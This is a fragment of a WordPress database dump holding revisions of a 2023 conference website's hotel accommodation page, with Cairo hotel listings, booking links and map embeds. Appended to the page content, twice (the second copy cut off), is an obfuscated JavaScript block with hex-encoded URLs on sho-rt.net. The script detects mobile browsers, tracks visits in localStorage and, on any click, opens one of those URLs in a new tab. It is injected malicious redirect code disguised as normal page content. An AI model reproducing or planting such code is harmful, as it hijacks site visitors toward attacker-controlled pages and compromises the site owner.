primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong>EXAMPLE</strong></span></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_gmaps][/vc_column][vc_column width=\"1/2\"][dt_media_gallery_carousel image_border_radius=\"0px\" slides_on_wide_desk=\"1\" slides_on_desk=\"1\" slides_on_lapt=\"1\" slides_on_h_tabs=\"1\" slides_on_v_tabs=\"1\" stage_padding=\"10\" autoplay=\"y\" autoplay_speed=\"3000\" project_icon_color=\"#ffffff\" project_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" show_bullets=\"y\" bullets_h_offset=\"0px\" include=\"4833,4791\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-25 19:07:52','2023-06-25 19:07:52','',2685,'https://gsw2023.com/?p=4842',0,'revision','',0),
(4843,4,'2023-06-25 19:11:03','2023-06-25 19:11:03','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_btn title=\"BOOK NOW\" style=\"custom\" custom_background=\"#4169e1\" custom_text=\"#ffffff\" align=\"center\" button_block=\"true\"][vc_gmaps][/vc_column][vc_column width=\"1/2\"][dt_media_gallery_carousel image_border_radius=\"0px\" slides_on_wide_desk=\"1\" slides_on_desk=\"1\" slides_on_lapt=\"1\" slides_on_h_tabs=\"1\" slides_on_v_tabs=\"1\" stage_padding=\"10\" autoplay=\"y\" autoplay_speed=\"3000\" project_icon_color=\"#ffffff\" project_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" show_bullets=\"y\" bullets_h_offset=\"0px\" include=\"4833,4791\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 